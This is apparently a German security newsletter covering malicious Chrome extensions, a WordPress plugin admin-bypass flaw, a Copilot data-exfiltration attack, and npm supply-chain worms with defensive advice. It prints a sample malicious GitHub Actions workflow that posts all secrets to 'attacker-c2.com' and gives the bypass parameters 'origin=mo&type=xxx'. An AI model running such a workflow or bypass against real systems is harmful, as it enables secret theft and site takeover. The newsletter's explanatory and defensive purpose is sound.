DARUM GEHTS…
Diese Woche schauen wir uns an, wie fünf Chrome-Extensions Enterprise-HR-Systeme unterwanderten, warum ein WordPress-Plugin mit CVSS 10.0 gerade aktiv ausgenutzt wird, und wie ein Single-Click-Angriff auf Microsoft Copilot funktionierte.
Im Deep Dive werfen wir einen Blick auf die nächste Generation der Supply-Chain-Angriffe und warum 2026 das Jahr der Software-Lieferketten-Würmer werden könnte.
Los geht's…
Die trojanischen Produktivitätstools
Chrome-Extension-Malware
"Die Extensions arbeiten zusammen, um Authentication-Tokens zu stehlen, Incident-Response-Fähigkeiten zu blockieren und komplette Account-Übernahmen durch Session-Hijacking zu ermöglichen. Die Kampagne setzt drei verschiedene Angriffstypen ein: Cookie-Exfiltration zu Remote-Servern, DOM-Manipulation um Security-Administration-Seiten zu blockieren, und bidirektionale Cookie-Injection für direktes Session-Hijacking. Die Extensions zielen auf dieselben Enterprise-Plattformen ab und teilen identische Security-Tool-Detektionslisten, API-Endpoint-Patterns und Code-Strukturen, was auf eine koordinierte Operation hindeutet, obwohl sie als separate Publisher erscheinen."
Instant-Admin-Zugang ohne Login
WordPress Modular DS Plugin
"Die Vulnerability, getrackt als CVE-2026-23550 (CVSS-Score: 10.0), wurde als Fall von unauthentifizierter Privilege-Escalation beschrieben, der alle Versionen des Plugins vor und einschließlich 2.5.1 betrifft. Sie wurde in Version 2.5.2 gepatcht. Das Plugin hat mehr als 40.000 aktive Installationen. In Versionen 2.5.1 und darunter ist das Plugin anfällig für Privilege-Escalation aufgrund einer Kombination von Faktoren, einschließlich direkter Route-Selection, Umgehung von Authentifizierungsmechanismen und Auto-Login als Admin. Das Problem liegt im Routing-Mechanismus begründet, der bestimmte sensitive Routes hinter einer Authentication-Barrier schützen soll. Die Sicherheitsschicht kann jedoch jedes Mal umgangen werden, wenn der 'direct request'-Modus aktiviert ist, indem ein 'origin'-Parameter auf 'mo' und ein 'type'-Parameter auf einen beliebigen Wert gesetzt wird (z.B. origin=mo&type=xxx)."
Ein Klick genügt
Microsoft Copilot "Reprompt"
"Varonis Threat Labs hat einen neuen Attack-Flow namens Reprompt aufgedeckt, der Threat Actors einen unsichtbaren Einstiegspunkt bietet, um eine Data-Exfiltration-Chain durchzuführen, die Enterprise-Security-Controls komplett umgeht und auf sensitive Daten ohne Erkennung zugreift – alles mit einem Klick. Erstmals in Microsoft Copilot Personal entdeckt, ist Reprompt aus mehreren Gründen wichtig: Nur ein einzelner Klick auf einen legitimen Microsoft-Link ist erforderlich, um Opfer zu kompromittieren. Keine Plugins, keine User-Interaktion mit Copilot. Der Angreifer behält die Kontrolle auch wenn der Copilot-Chat geschlossen wird, wodurch die Session des Opfers still exfiltriert werden kann, ohne jegliche Interaktion über den ersten Klick hinaus."
Deep Dive: Supply Chain Worms 2026 – Die nächste Generation
Von Registry-Malware zu selbstreplizierenden Würmern
2025 war ein Wendepunkt für Software-Supply-Chain-Angriffe. Zwischen August und November sahen wir eine koordinierte Serie von Attacken, die zeigt, wohin die Reise geht:
s1ngularity (August 2025)
Kompromittierte Nx-Packages
2.349 Credentials von 1.079 Developer-Systemen geerntet
NPM-Tokens gestohlen
Shai-Hulud 1.0 (September 2025)
Alle Patient-Zero-Packages hatten Nx als Dependency
Indikation: Gestohlene NPM-Tokens aus s1ngularity ermöglichten den Angriff
Erster echter "Wurm" in der npm-Registry
Shai-Hulud 2.0 (Oktober-November 2025)
33.185 unique Secrets über 20.649 Repositories
True Worm-Behavior mit Selbstreplikation
Malware-Ausführung während Build-Prozess
Wie Shai-Hulud 2.0 funktionierte
Wenn ein Developer oder CI/CD-Runner ein kompromittiertes NPM-Package installierte, führte die Malware während des Build-Prozesses aus:
Phase 1: Installation
javascript
// npm install kompromittiertes-package
// Postinstall-Hook triggert Malware-AusführungPhase 2: Credential Harvesting
Die Malware scannte nach:
NPM-Tokens in
.npmrcGitHub-Tokens in Umgebungsvariablen
API-Keys in Config-Files
SSH-Keys
Cloud-Provider-Credentials (AWS, Azure, GCP)
Phase 3: Repository-Scanning
Mit gestohlenen GitHub-Tokens:
Private Repositories geklont
Nach weiteren Secrets gescannt
Package.json-Files identifiziert
Phase 4: Propagation
Mit gestohlenen NPM-Tokens:
Malicious Updates zu legitimen Packages gepusht
Neue malicious Packages veröffentlicht
Typosquatting-Varianten populärer Packages erstellt
Phase 5: Data Exfiltration
Alle gesammelten Daten zu C2-Server:
Credentials
Private-Code-Repository-Listen
Organizational-Info
Infrastructure-Details
Warum npm das Hauptziel ist
90% der Open-Source-Malware 2025 war auf npm
Gründe:
JavaScript-Popularität: Meistverwendete Sprache
Repository-Größe: Größte Software-Registry der Welt
Langsamere Security-Controls: Im Vergleich zu PyPI oder RubyGems
Build-Zeit-Execution: Postinstall-Hooks ermöglichen automatische Ausführung
Transitive Dependencies: Durchschnittlich 79 Dependencies pro Package
Die 73%-Explosion
ReversingLabs' 2026 Software Supply Chain Security Report zeigt:
73% Anstieg bei malicious Open-Source-Packages
Verschiebung von obscuren Single-Maintainer-Projects zu populären, aktiv-gewarteten Packages
Fokus auf hochwertige Ziele mit maximaler Downstream-Impact
Attack-Techniken 2025/2026
1. Dependency Confusion
Angreifer veröffentlichen public Packages mit identischen Namen wie private Internal-Packages. Package-Manager priorisieren oft die public Version.
2. Typosquatting
Packages mit Namen ähnlich zu populären Libraries:
lodshstattlodashreqeststattrequestcolorstattcolours
3. GitHub Actions Manipulation
Kompromittierung von Workflows in .github/workflows/:
yaml
# Malicious Workflow
on: [push]
jobs:
exfiltrate:
runs-on: ubuntu-latest
steps:
- name: Steal Secrets
run: |
curl -X POST attacker-c2.com \
-d "secrets=${{ toJson(secrets) }}"Die GhostAction-Kampagne kompromittierte 327 GitHub-User und stahl 3.325 Secrets durch injizierte malicious Workflows.
4. Maintainer-Account-Compromise
Phishing oder Credential-Stuffing gegen Package-Maintainer. Ein einziger kompromittierter Account kann Millionen Downloads erreichen.
5. Registry-Native Worms
Wie Shai-Hulud: Selbstreplizierende Malware, die sich automatisch durch die Registry propagiert.
Was kommt 2026?
Expansion über npm hinaus
PyPI hat stärkere Security-Controls, aber Maven, RubyGems und NuGet bleiben verwundbar. Angreifer werden:
Tiefe statt Breite fokussieren (Single-Ecosystem-Dominanz)
Kubernetes-Secrets und Container-Registries targetieren
Infrastructure-as-Code-Plattformen kompromittieren (Terraform, Pulumi)
KI-beschleunigte Angriffe
AI-Fuzzer und automatisierte Scanner beschleunigen Discovery:
Vulnerability-Pattern-Recognition
Automated Exploit-Generation
Scale-up von Attack-Campaigns
Cryptocurrency & AI-Pipeline-Targeting
Crypto-Wallets und AI-Training-Pipelines sind hochwertige Ziele:
Direct financial Impact
Intellectual-Property-Theft
Training-Data-Poisoning
Defense-Strategien
1. Dependency Cooldowns (Sofort-Protection)
7-14 Tage Delay nach Package-Release, bevor es als Dependency akzeptiert wird.
Warum es funktioniert: Security-Vendor wie Socket, Aikido und andere scannen kontinuierlich Registries. Detection erfolgt durch:
Automated Behavior-Analysis
Code-Pattern-Recognition
Anomaly-Detection
Ein 7-Tage-Cooldown hätte 8 von 10 Major Supply-Chain-Attacks 2025 verhindert.
Implementation:
json
// package.json
{
"dependencies": {
"lodash": "4.17.21" // Fixed version
},
"resolutions": {
"lodash": "4.17.21"
}
}2. Software Bill of Materials (SBOM)
Kontinuierlich aktualisierte SBOMs, nicht als statische Compliance-Dokumente:
Runtime-Validation
Vulnerability-Correlation
Actual-Usage-Assessment
3. Zero-Trust für Dependencies
Least-Privilege für Package-Permissions
Sandboxed Execution während Builds
Network-Segmentation für CI/CD-Pipelines
4. Secrets-Management
Keine Secrets in Code oder Config-Files
Vault-Lösungen (HashiCorp Vault, AWS Secrets Manager)
Secret-Scanning in Pre-Commit-Hooks
5. Supply-Chain-Monitoring
Real-time Monitoring statt point-in-time Scans:
Runtime-Behavior-Analysis
Anomaly-Detection in Production
Continuous Verification
Shai-Hulud 2.0: Die Lektion
33.185 Secrets. 20.649 Repositories. Ein koordinierter Angriff.
Die nächste Version wird produktionsreif sein. Die Frage ist nicht ob, sondern wann die nächste Generation von Supply-Chain-Würmern zuschlägt.
Organizations, die jetzt nicht handeln, werden 2026 mit exponentiell schlimmeren Attacken konfrontiert sein.
Bei der Recherche verwendete Ressourcen:
ReversingLabs: "2026 Software Supply Chain Security Report"
Socket: "5 Malicious Chrome Extensions Enable Session Hijacking"
GitGuardian: "Supply Chain Worms 2026: What Shai-Hulud Taught Attackers"
Dark Reading: "Cybersecurity Predictions for 2026"
CISA: "2025 Minimum Elements for a Software Bill of Materials (SBOM)"
📬 IPv5 wachsen lassen!
IPv5 bleibt kostenlos und werbefrei – aber nur, wenn wir genug Leser erreichen. Kennst du jemanden, der von diesem Newsletter profitieren würde? Leite diese Mail einfach weiter. Jeder neue Leser hilft uns, dieses Projekt am Leben zu halten.
Bis nächste Woche ❤️
IPv5




